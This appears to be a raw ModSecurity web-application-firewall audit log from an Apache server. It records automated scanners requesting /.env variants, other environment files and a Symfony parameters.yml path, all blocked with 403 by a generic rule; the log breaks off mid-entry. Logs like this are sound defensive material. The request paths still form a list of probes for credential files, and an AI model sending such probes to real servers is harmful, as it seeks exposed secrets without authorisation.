ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9468cd7a-Z-- --fb3b9855-A-- [20/Apr/2025:12:18:04 +0700] aASDjFu16wJWB6g0mU-EHQAAABQ 103.236.140.4 46094 103.236.140.4 8181 --fb3b9855-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.2.13 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.2.13 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fb3b9855-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb3b9855-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745126284788238 814 (- - -) Stopwatch2: 1745126284788238 814; combined=286, p1=250, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb3b9855-Z-- --10fa324c-A-- [20/Apr/2025:14:03:41 +0700] aAScTcTCDeBrh52UaHRfIQAAAJg 103.236.140.4 43732 103.236.140.4 8181 --10fa324c-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --10fa324c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10fa324c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132621501183 821 (- - -) Stopwatch2: 1745132621501183 821; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fa324c-Z-- --0a1c4943-A-- [20/Apr/2025:14:04:14 +0700] aAScblu16wJWB6g0mU-b5QAAAAA 103.236.140.4 43868 103.236.140.4 8181 --0a1c4943-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 --0a1c4943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a1c4943-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132654757702 872 (- - -) Stopwatch2: 1745132654757702 872; combined=343, p1=280, p2=0, p3=0, p4=0, p5=62, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a1c4943-Z-- --446f8163-A-- [20/Apr/2025:14:04:15 +0700] aAScb8TCDeBrh52UaHRfKQAAAJQ 103.236.140.4 43870 103.236.140.4 8181 --446f8163-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Moto E (4) Build/NCQ26.69-56) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 --446f8163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --446f8163-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132655294642 792 (- - -) Stopwatch2: 1745132655294642 792; combined=293, p1=254, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --446f8163-Z-- --a97e522f-A-- [20/Apr/2025:14:04:18 +0700] aAScclTf0pL9EQC7JDWtbQAAAFc 103.236.140.4 43886 103.236.140.4 8181 --a97e522f-B-- GET /.env.example HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; N9510 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --a97e522f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a97e522f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132658063138 836 (- - -) Stopwatch2: 1745132658063138 836; combined=340, p1=300, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a97e522f-Z-- --5711ad49-A-- [20/Apr/2025:14:04:20 +0700] aAScdEAzeWrUIk0gvAu-sAAAANA 103.236.140.4 43900 103.236.140.4 8181 --5711ad49-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; SM-T310 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 --5711ad49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5711ad49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132660173736 847 (- - -) Stopwatch2: 1745132660173736 847; combined=362, p1=262, p2=0, p3=0, p4=0, p5=100, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5711ad49-Z-- --aa342c22-A-- [20/Apr/2025:14:04:22 +0700] aAScdlTf0pL9EQC7JDWtbgAAAEo 103.236.140.4 43910 103.236.140.4 8181 --aa342c22-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312 --aa342c22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa342c22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132662122923 851 (- - -) Stopwatch2: 1745132662122923 851; combined=288, p1=248, p2=0, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa342c22-Z-- --1fffb631-A-- [20/Apr/2025:14:04:23 +0700] aAScd1u16wJWB6g0mU-b6AAAABY 103.236.140.4 43912 103.236.140.4 8181 --1fffb631-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.3; KFAPWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/44.1.81 like Chrome/44.0.2403.128 Safari/537.36 --1fffb631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fffb631-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132663045783 777 (- - -) Stopwatch2: 1745132663045783 777; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fffb631-Z-- --7f09106a-A-- [20/Apr/2025:14:04:25 +0700] aASceUAzeWrUIk0gvAu-sQAAANU 103.236.140.4 43922 103.236.140.4 8181 --7f09106a-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.52 (KHTML, like Gecko) Version/9.0 Safari/601.1.52 --7f09106a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f09106a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132665026221 803 (- - -) Stopwatch2: 1745132665026221 803; combined=311, p1=271, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f09106a-Z-- --2d70ff12-A-- [20/Apr/2025:14:04:25 +0700] aASceVu16wJWB6g0mU-b6gAAAAI 103.236.140.4 43928 103.236.140.4 8181 --2d70ff12-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36 --2d70ff12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d70ff12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132665729081 855 (- - -) Stopwatch2: 1745132665729081 855; combined=336, p1=298, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d70ff12-Z-- --001a6c43-A-- [20/Apr/2025:14:04:26 +0700] aAScelu16wJWB6g0mU-b7QAAABE 103.236.140.4 43936 103.236.140.4 8181 --001a6c43-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --001a6c43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --001a6c43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132666967294 783 (- - -) Stopwatch2: 1745132666967294 783; combined=322, p1=290, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --001a6c43-Z-- --b7d1654e-A-- [20/Apr/2025:14:04:27 +0700] aASce0AzeWrUIk0gvAu-sgAAAME 103.236.140.4 43942 103.236.140.4 8181 --b7d1654e-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 --b7d1654e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7d1654e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132667483317 820 (- - -) Stopwatch2: 1745132667483317 820; combined=312, p1=269, p2=0, p3=0, p4=0, p5=42, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7d1654e-Z-- --0f4dc853-A-- [20/Apr/2025:14:04:29 +0700] aAScfUAzeWrUIk0gvAu-swAAANM 103.236.140.4 43950 103.236.140.4 8181 --0f4dc853-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; TECNO W2 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 OPR/19.0.2254.108926 --0f4dc853-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f4dc853-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132669299018 817 (- - -) Stopwatch2: 1745132669299018 817; combined=335, p1=294, p2=0, p3=0, p4=0, p5=40, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f4dc853-Z-- --b9f6cb17-A-- [20/Apr/2025:14:04:30 +0700] aAScflTf0pL9EQC7JDWtcQAAAEA 103.236.140.4 43956 103.236.140.4 8181 --b9f6cb17-B-- GET /demo/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB7.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; AskTbORJ/5.15.15.36191) --b9f6cb17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9f6cb17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132670044999 793 (- - -) Stopwatch2: 1745132670044999 793; combined=310, p1=272, p2=0, p3=0, p4=0, p5=37, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9f6cb17-Z-- --0df17033-A-- [20/Apr/2025:14:04:34 +0700] aAScgsTCDeBrh52UaHRfMgAAAI0 103.236.140.4 43980 103.236.140.4 8181 --0df17033-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe --0df17033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0df17033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132674216370 833 (- - -) Stopwatch2: 1745132674216370 833; combined=353, p1=318, p2=0, p3=0, p4=0, p5=34, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df17033-Z-- --121ed830-A-- [20/Apr/2025:14:06:17 +0700] aASc6VTf0pL9EQC7JDWuNAAAAE0 103.236.140.4 45784 103.236.140.4 8181 --121ed830-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --121ed830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --121ed830-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132777123455 793 (- - -) Stopwatch2: 1745132777123455 793; combined=317, p1=264, p2=0, p3=0, p4=0, p5=53, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --121ed830-Z-- --afc0eb2e-A-- [20/Apr/2025:14:53:09 +0700] aASn5Vu16wJWB6g0mU-nKAAAABU 103.236.140.4 44222 103.236.140.4 8181 --afc0eb2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.36.26 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.36.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --afc0eb2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afc0eb2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745135589668886 778 (- - -) Stopwatch2: 1745135589668886 778; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afc0eb2e-Z-- --544b3f4d-A-- [20/Apr/2025:16:36:37 +0700] aATAJUAzeWrUIk0gvAvP_AAAAMI 103.236.140.4 39970 103.236.140.4 8181 --544b3f4d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 138.68.82.23 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --544b3f4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --544b3f4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745141797529608 830 (- - -) Stopwatch2: 1745141797529608 830; combined=322, p1=288, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --544b3f4d-Z-- --95908606-A-- [20/Apr/2025:17:29:46 +0700] aATMmkAzeWrUIk0gvAvhpgAAAMc 103.236.140.4 52462 103.236.140.4 8181 --95908606-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.63.48 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.63.48 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --95908606-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95908606-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745144986632321 815 (- - -) Stopwatch2: 1745144986632321 815; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95908606-Z-- --45ca4932-A-- [20/Apr/2025:18:29:38 +0700] aATaokAzeWrUIk0gvAsoagAAANI 103.236.140.4 53730 103.236.140.4 8181 --45ca4932-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.251.69.35 X-Forwarded-Host: smkn22-jkt.sch.id 